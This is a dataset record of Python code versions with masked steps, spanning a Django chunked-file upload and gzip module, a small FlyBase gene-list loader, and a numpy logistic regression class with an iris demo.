new_file_name\n file_obj.offset = stats.st_size\n file_obj.save()\n out = {'zipped': True, 'file_name': output_file_name, 'file_size':\n new_file_size}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(file_obj.offset)\n auto_fields[DataFile().get_qualified_field('name')] = output_file_name\n auto_fields[DataFile().get_qualified_field('file_location')\n ] = new_file_name\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = jsonpickle.encode(out)\n return HttpResponse(out, content_type='json')\n",
"step-4": "<mask token>\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n \"\"\"\n \"\"\"\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n from django.utils import timezone\n if request.method == 'POST':\n c = {}\n f = request.FILES['file']\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on':\n timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name\n ), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n files = {'files': {}}\n files['files']['name'] = f._name\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=\n user_id, filename=file_name).order_by('-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef get_partial_uploads(request):\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id\n ).order_by('created_on')\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef hash_upload(request):\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda : f.read(8192), b''):\n md5.update(chunk)\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_hash')] = file_obj.hash\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n file_id = request.GET['file_id']\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n zip_threshold = 200000000\n is_zipped = u.is_gzipped(file_name)\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n else:\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[\n 1]\n except:\n output_dict['file_type'] = 'unknown'\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n profile_id = request.session['profile_id']\n component = 'datafile'\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_id')] = file_id\n auto_fields[DataFile().get_qualified_field('file_type')] = output_dict[\n 'file_type']\n auto_fields[DataFile().get_qualified_field('file_location')] = file_name\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field('name')\n ] = chunked_upload.filename\n type = [f for f in d_utils.get_copo_schema(component) if f.get('id').\n split('.')[-1] == 'type']\n if type:\n type = type[0]['default_value']\n auto_fields[DataFile().get_qualified_field('type')] = type\n df = BrokerDA(context=dict(), profile_id=profile_id, component=\n component, auto_fields=auto_fields, visualize='last_record'\n ).do_save_edit().get('record_object', dict())\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\ndef zip_file(request):\n file_id = request.GET['file_id']\n print('zip started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name\n )\n output_file_name = file_obj.filename + '.gz'\n try:\n temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) +\n '.tmp')\n myzip = gzip.open(temp_name, 'wb', compresslevel=1)\n src = open(output_file_location, 'r')\n n = 100000000\n for chunk in iter(lambda : src.read(n), ''):\n myzip.write(bytes(chunk, 'UTF-8'))\n finally:\n myzip.close()\n src.close()\n print('zip complete ' + file_id)\n new_file_name = output_file_location + '.gz'\n os.rename(temp_name, new_file_name)\n os.remove(output_file_location)\n stats = os.stat(new_file_name)\n new_file_size = stats.st_size / 1000 / 1000\n file_obj.filename = output_file_name\n file_obj.file.name = new_file_name\n file_obj.offset = stats.st_size\n file_obj.save()\n out = {'zipped': True, 'file_name': output_file_name, 'file_size':\n new_file_size}\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field('file_size')\n ] = u.filesize_toString(file_obj.offset)\n auto_fields[DataFile().get_qualified_field('name')] = output_file_name\n auto_fields[DataFile().get_qualified_field('file_location')\n ] = new_file_name\n profile_id = request.session['profile_id']\n component = 'datafile'\n BrokerDA(target_id=str(record_object.get('_id', str())), component=\n component, auto_fields=auto_fields).do_save_edit()\n out = jsonpickle.encode(out)\n return HttpResponse(out, content_type='json')\n",
"step-5": "__author__ = 'fshaw'\nimport gzip\nimport hashlib\nimport os\nimport uuid\nimport json\nimport jsonpickle\nfrom chunked_upload.models import ChunkedUpload\nfrom chunked_upload.views import ChunkedUploadView, ChunkedUploadCompleteView\nfrom django.conf import settings\nfrom django.core import serializers\nfrom django.core.files.base import ContentFile\nfrom django.http import HttpResponse\nfrom django.template.context_processors import csrf\nfrom rest_framework.renderers import JSONRenderer\n\nimport web.apps.web_copo.schemas.utils.data_utils as d_utils\nimport web.apps.web_copo.utils.EnaUtils as u\nfrom dal.broker_da import BrokerDA\nfrom dal.copo_da import DataFile\nfrom web.apps.web_copo.rest.models import CopoChunkedUpload\n\n\nclass CopoChunkedUploadCompleteView(ChunkedUploadCompleteView):\n do_md5_check = False\n\n def get_response_data(self, chunked_upload, request):\n \"\"\"\n Data for the response. Should return a dictionary-like object.\n Called *only* if POST is successful.\n \"\"\"\n files = {'files': {}}\n files['files']['name'] = chunked_upload.filename\n files['files']['id'] = chunked_upload.id\n files['files']['size'] = chunked_upload.offset / (1000 * 1000.0)\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n\n str = jsonpickle.encode(files)\n return files\n\n\nclass CopoChunkedUploadView(ChunkedUploadView):\n model = CopoChunkedUpload\n\n '''\n '''\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\ndef receive_data_file(request):\n # this method is called for writing smaller files (<= 260MB) to disk, larger files use the\n # upload method in ChunkedUpload class\n\n from django.utils import timezone\n # need to make a chunked upload record to store deails of the file\n if request.method == 'POST':\n\n c = {}\n f = request.FILES['file']\n\n fname = f.__str__()\n attrs = {'user': request.user, 'filename': fname, 'completed_on': timezone.now(), 'offset': f.size}\n chunked_upload = ChunkedUpload(**attrs)\n # file starts empty\n chunked_upload.file.save(name='', content=ContentFile(''), save=True)\n\n path = chunked_upload.file\n destination = open(os.path.join(settings.MEDIA_ROOT, path.file.name), 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n c.update(csrf(request))\n\n # create output structure to pass back to jquery-upload\n files = {'files': {}}\n files['files']['name'] = f._name\n\n files['files']['size'] = path.size / (1000 * 1000.0)\n files['files']['id'] = chunked_upload.id\n files['files']['url'] = ''\n files['files']['thumbnailUrl'] = ''\n files['files']['deleteUrl'] = ''\n files['files']['deleteType'] = 'DELETE'\n\n str = jsonpickle.encode(files)\n return HttpResponse(str, content_type='json')\n\n\ndef resume_chunked(request):\n file_name = request.GET.get('filename')\n user_id = request.user.id\n # retrieve incomplete file for user with this name\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id, filename=file_name).order_by(\n '-offset')[:1]\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef get_partial_uploads(request):\n user_id = request.user.id\n d = ChunkedUpload.objects.filter(completed_on__isnull=True, user_id=user_id).order_by('created_on')\n if d:\n out = serializers.serialize('json', d)\n return HttpResponse(jsonpickle.encode(out))\n else:\n return HttpResponse(jsonpickle.encode(''))\n\n\ndef hash_upload(request):\n # utility method to create an md5 hash of a given file path\n # open uploaded file\n file_id = request.GET['file_id']\n print('hash started ' + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n file_name = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n\n # now hash opened file\n md5 = hashlib.md5()\n with open(file_name, 'rb') as f:\n for chunk in iter(lambda: f.read(8192), b''):\n md5.update(chunk)\n\n file_obj.hash = md5.hexdigest()\n file_obj.save()\n\n output_dict = {'output_hash': md5.hexdigest(), 'file_id': file_id}\n\n # update record in mongo\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field(\"file_hash\")] = file_obj.hash\n\n profile_id = request.session['profile_id']\n component = \"datafile\"\n\n BrokerDA(target_id=str(record_object.get(\"_id\", str())),\n component=component,\n auto_fields=auto_fields\n ).do_save_edit()\n\n out = json.dumps(output_dict)\n print('hash complete ' + file_id)\n return HttpResponse(out, content_type='json')\n\n\ndef inspect_file(request):\n # utility method to examine a file and return meta-data to the frontend\n output_dict = {'file_type': 'unknown', 'do_compress': False}\n\n # get reference to file\n file_id = request.GET['file_id']\n\n chunked_upload = ChunkedUpload.objects.get(id=int(file_id))\n file_name = os.path.join(settings.MEDIA_ROOT, chunked_upload.file.name)\n\n # size threshold to determine if a file should be compressed\n zip_threshold = 200000000 # size in bytes\n\n # check if file is compressed\n is_zipped = u.is_gzipped(file_name)\n\n if chunked_upload.offset >= zip_threshold and not is_zipped:\n output_dict['do_compress'] = True\n\n # check for file type\n if u.is_pdf_file(file_name):\n output_dict['file_type'] = 'pdf'\n else:\n try:\n if u.is_fastq_file(file_name):\n output_dict['file_type'] = 'fastq'\n if not is_zipped:\n output_dict['do_compress'] = True\n elif u.is_sam_file(file_name):\n output_dict['file_type'] = 'sam'\n if not is_zipped:\n output_dict['do_compress'] = False\n elif u.is_bam_file(file_name):\n output_dict['file_type'] = 'bam'\n if not is_zipped:\n output_dict['do_compress'] = False\n\n else: # make file type same as extension\n output_dict['file_type'] = chunked_upload.filename.rsplit('.')[1]\n except:\n output_dict['file_type'] = 'unknown'\n\n # add datafile schema\n chunked_upload.type = output_dict['file_type']\n chunked_upload.save()\n\n # ...and obtain the inserted record\n profile_id = request.session['profile_id']\n component = \"datafile\"\n\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field(\"file_id\")] = file_id\n auto_fields[DataFile().get_qualified_field(\"file_type\")] = output_dict['file_type']\n auto_fields[DataFile().get_qualified_field(\"file_location\")] = file_name\n auto_fields[DataFile().get_qualified_field(\"file_size\")] = u.filesize_toString(chunked_upload.offset)\n auto_fields[DataFile().get_qualified_field(\"name\")] = chunked_upload.filename\n\n # get default type from schema\n type = [f for f in d_utils.get_copo_schema(component) if f.get(\"id\").split(\".\")[-1] == \"type\"]\n if type:\n type = type[0][\"default_value\"]\n auto_fields[DataFile().get_qualified_field(\"type\")] = type\n\n df = BrokerDA(context=dict(),\n profile_id=profile_id,\n component=component,\n auto_fields=auto_fields,\n visualize=\"last_record\"\n ).do_save_edit().get(\"record_object\", dict())\n\n out = jsonpickle.encode(output_dict)\n return HttpResponse(out, content_type='json')\n\n\ndef zip_file(request):\n # need to get a reference to the file to zip\n file_id = request.GET['file_id']\n print(\"zip started \" + file_id)\n file_obj = ChunkedUpload.objects.get(pk=file_id)\n\n # get the name of the file to zip and change its suffix to .gz\n output_file_location = os.path.join(settings.MEDIA_ROOT, file_obj.file.name)\n output_file_name = file_obj.filename + '.gz'\n try:\n # open the file as gzip acrchive...set compression level\n temp_name = os.path.join(settings.MEDIA_ROOT, str(uuid.uuid4()) + '.tmp')\n myzip = gzip.open(temp_name, 'wb', compresslevel=1)\n src = open(output_file_location, 'r')\n\n # write input file to gzip archive in n byte chunks\n n = 100000000\n for chunk in iter(lambda: src.read(n), ''):\n myzip.write(bytes(chunk, 'UTF-8'))\n finally:\n myzip.close()\n src.close()\n\n print('zip complete ' + file_id)\n # now need to delete the old file and update the file record with the new file\n new_file_name = output_file_location + '.gz'\n os.rename(temp_name, new_file_name)\n os.remove(output_file_location)\n\n # calculate new file size\n stats = os.stat(new_file_name)\n new_file_size = stats.st_size / 1000 / 1000\n\n # update filename\n file_obj.filename = output_file_name\n file_obj.file.name = new_file_name\n\n # update file size\n file_obj.offset = stats.st_size\n file_obj.save()\n\n out = {'zipped': True, 'file_name': output_file_name, 'file_size': new_file_size}\n\n # update record in mongo\n record_object = DataFile().get_by_file_id(file_id)\n auto_fields = dict()\n auto_fields[DataFile().get_qualified_field(\"file_size\")] = u.filesize_toString(file_obj.offset)\n auto_fields[DataFile().get_qualified_field(\"name\")] = output_file_name\n auto_fields[DataFile().get_qualified_field(\"file_location\")] = new_file_name\n\n profile_id = request.session['profile_id']\n component = \"datafile\"\n\n BrokerDA(target_id=str(record_object.get(\"_id\", str())),\n component=component,\n auto_fields=auto_fields\n ).do_save_edit()\n\n out = jsonpickle.encode(out)\n return HttpResponse(out, content_type='json')\n",
"step-ids": [
12,
13,
14,
15,
18
]
}
|
[
12,
13,
14,
15,
18
] |
import os
import config
############################
# NMJ_RNAI LOF/GOF GENE LIST
def nmj_rnai_set_path():
return os.path.join(config.datadir, 'NMJ RNAi Search File.txt')
def nmj_rnai_gain_of_function_set_path():
return os.path.join(config.datadir, 'NMJ_RNAi_gain_of_function_flybase_ids.txt')
def get_nmj_rnai_genes():
'''
Return a list of flybase gene ids.
The hits from three different screens (Aaron D'Antonio, Sanyal and
Featherstone). This contains FBgn IDs, which can be converted to gene
symbols using flybase ID converter
'''
path = nmj_rnai_set_path()
print path
with open(path) as fh:
# Skip first line, the header
genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]
return genes
def get_nmj_rnai_gain_of_function_genes():
'''
Return a list of flybase gene ids.
The gain of function genes should be a curated subset of the NMJ RNAi
genes. They were defined in a file Elizabeth McNeill sent,
"NMJ RNAi Gainoffunctionscreens.xlsx".
The hits from three different screens (Aaron D'Antonio, Sanyal and
Featherstone). This contains FBgn IDs, which can be converted to gene
symbols using flybase ID converter.
'''
path = nmj_rnai_gain_of_function_set_path()
print path
with open(path) as fh:
# Skip first line, the header
genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]
return genes
|
normal
|
{
"blob_id": "6a9d64b1ef5ae8e9d617c8b0534e96c9ce7ea629",
"index": 4951,
"step-1": "\nimport os\n\nimport config\n\n\n############################\n# NMJ_RNAI LOF/GOF GENE LIST\n\ndef nmj_rnai_set_path():\n return os.path.join(config.datadir, 'NMJ RNAi Search File.txt')\n\n\ndef nmj_rnai_gain_of_function_set_path():\n return os.path.join(config.datadir, 'NMJ_RNAi_gain_of_function_flybase_ids.txt')\n\n\ndef get_nmj_rnai_genes():\n '''\n Return a list of flybase gene ids.\n\n The hits from three different screens (Aaron D'Antonio, Sanyal and\n Featherstone). This contains FBgn IDs, which can be converted to gene\n symbols using flybase ID converter \n '''\n path = nmj_rnai_set_path()\n print path\n with open(path) as fh:\n # Skip first line, the header\n genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]\n return genes\n\n\ndef get_nmj_rnai_gain_of_function_genes():\n '''\n Return a list of flybase gene ids.\n\n The gain of function genes should be a curated subset of the NMJ RNAi\n genes. They were defined in a file Elizabeth McNeill sent, \n \"NMJ RNAi Gainoffunctionscreens.xlsx\".\n\n The hits from three different screens (Aaron D'Antonio, Sanyal and\n Featherstone). This contains FBgn IDs, which can be converted to gene\n symbols using flybase ID converter.\n '''\n path = nmj_rnai_gain_of_function_set_path()\n print path\n with open(path) as fh:\n # Skip first line, the header\n genes = [line.strip() for i, line in enumerate(fh) if i > 0 and line.strip()]\n return genes\n\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import numpy as np
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
class LogisticRegression:
'''LogisticRegression for binary classification
max_iter: the maximum iteration times for training
learning_rate: learing rate for gradiend decsend training
Input's shape should be [sample_nums, data_dims]
attrs:
max_iter
learning_rate
(after fit)
w
b
costs
methods:
fit
predict
predict_proba
score
'''
def __init__(self, max_iter=2000, learning_rate=0.01):
self.max_iter = max_iter
self.learning_rate = learning_rate
print('LogisticRegression Model(learning_rate={}, max_iteration={})'.format(
self.learning_rate, self.max_iter))
def sigmoid(self, z):
return 1 / (1 + np.exp(-z))
def initialize_with_zeros(self, dim):
w = np.zeros((dim, 1))
b = 0
assert (w.shape == (dim, 1))
assert (isinstance(b, float) or isinstance(b, int))
return w, b
def propagate(self, w, b, X, Y):
m = X.shape[0]
A = self.sigmoid(np.dot(X, w) + b)
cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))
dw = 1 / m * np.dot(X.T, A - Y)
db = 1 / m * np.sum(A - Y)
assert (dw.shape == w.shape)
assert (db.dtype == float)
cost = np.squeeze(cost)
assert (cost.shape == ())
grads = {'dw': dw,
'db': db}
return grads, cost
def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):
costs = []
for i in range(1, max_iter+1):
grads, cost = self.propagate(w, b, X, Y)
w -= learning_rate * grads['dw']
b -= learning_rate * grads['db']
if i % 100 == 0:
costs.append(cost)
if print_cost:
print('Cost after iteration %i: %f'%(i, cost))
return w, b, costs
def fit(self, X, Y, print_cost=False):
print('Fit starting:')
w, b = self.initialize_with_zeros(X.shape[1])
iter_time = 0
self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.max_iter, self.learning_rate, print_cost)
print('Fit complished!')
def predict_proba(self, X):
return self.sigmoid(np.dot(X, self.w) + self.b)
def predict(self, X):
proba = self.predict_proba(X)
pre = np.zeros_like(proba, dtype=np.int)
pre[proba > 0.5] = 1
pre = np.squeeze(pre)
return pre
def score(self, X_test, Y_test):
Y_pre = self.predict(X_test)
score = np.sum(Y_pre == Y_test) / len(Y_pre)
return score
def __str__(self):
return 'LogisticRegression Model(learning_rate={}, max_iteration={})'.format(
self.learning_rate, self.max_iter)
if __name__ == '__main__':
from sklearn import datasets
from sklearn.model_selection import train_test_split
data = datasets.load_iris()
x = data.data[:100, [0,1]]
# x = np.hstack([np.ones((100, 1)), x])
y = np.array([1 if i > 0 else 0 for i in data.target[:100]])
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
model = LogisticRegression()
model.fit(x_train, y_train.reshape(len(y_train), -1), True)
print('Train Score:{}'.format(model.score(x_train, y_train)))
print('Test Score:{}'.format(model.score(x_test, y_test)))
plt.subplot(211)
x_samples = np.linspace(4, 7, 500)
y_samples = (- model.b - model.w[0]*x_samples) / model.w[1]
plt.plot(x_samples, y_samples, 'r')
plt.scatter(x[:50, 0], x[:50, 1], label='negative')
plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')
plt.xlabel('petal length')
plt.ylabel('petal width')
plt.title('LosRes Results on iris datasets')
plt.legend()
plt.subplots_adjust(hspace=0.5,wspace=0.25)
plt.subplot(212)
plt.plot(range(len(model.costs)), model.costs, '-o')
plt.xlabel('steps')
plt.ylabel('loss')
plt.title('loss function')
plt.show()
|
normal
|
{
"blob_id": "1dd62264aafe8ee745a3cfdfb994ac6a40c1af42",
"index": 1848,
"step-1": "<mask token>\n\n\nclass LogisticRegression:\n <mask token>\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n <mask token>\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n <mask token>\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LogisticRegression:\n <mask token>\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.\n max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n def __str__(self):\n return ('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n\n<mask token>\n",
"step-3": "<mask token>\nmatplotlib.use('TkAgg')\n<mask token>\n\n\nclass LogisticRegression:\n \"\"\"LogisticRegression for binary classification\n \n max_iter: the maximum iteration times for training\n learning_rate: learing rate for gradiend decsend training\n\n Input's shape should be [sample_nums, data_dims]\n\n attrs:\n max_iter\n learning_rate\n (after fit)\n w\n b\n costs\n\n methods:\n fit\n predict\n predict_proba\n score \n \"\"\"\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.\n max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n def __str__(self):\n return ('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n\nif __name__ == '__main__':\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n data = datasets.load_iris()\n x = data.data[:100, [0, 1]]\n y = np.array([(1 if i > 0 else 0) for i in data.target[:100]])\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n model = LogisticRegression()\n model.fit(x_train, y_train.reshape(len(y_train), -1), True)\n print('Train Score:{}'.format(model.score(x_train, y_train)))\n print('Test Score:{}'.format(model.score(x_test, y_test)))\n plt.subplot(211)\n x_samples = np.linspace(4, 7, 500)\n y_samples = (-model.b - model.w[0] * x_samples) / model.w[1]\n plt.plot(x_samples, y_samples, 'r')\n plt.scatter(x[:50, 0], x[:50, 1], label='negative')\n plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.title('LosRes Results on iris datasets')\n plt.legend()\n plt.subplots_adjust(hspace=0.5, wspace=0.25)\n plt.subplot(212)\n plt.plot(range(len(model.costs)), model.costs, '-o')\n plt.xlabel('steps')\n plt.ylabel('loss')\n plt.title('loss function')\n plt.show()\n",
